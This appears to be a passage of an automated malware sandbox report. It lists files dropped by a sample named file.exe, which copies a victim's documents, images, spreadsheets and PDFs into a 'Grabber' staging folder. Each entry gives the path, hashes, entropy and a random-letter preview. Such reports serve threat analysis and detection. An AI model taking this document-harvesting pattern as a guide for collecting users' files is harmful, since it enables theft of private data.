                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG\NIRMEKAMZH.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG\QFAPOWPAFG.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP\GNLQNHOLWB.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP\LHEPQPGEWF.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP\PWZOQIFCAN.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP\SNIPGPPREP.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\SNIPGPPREP\UBVUNTSCZJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
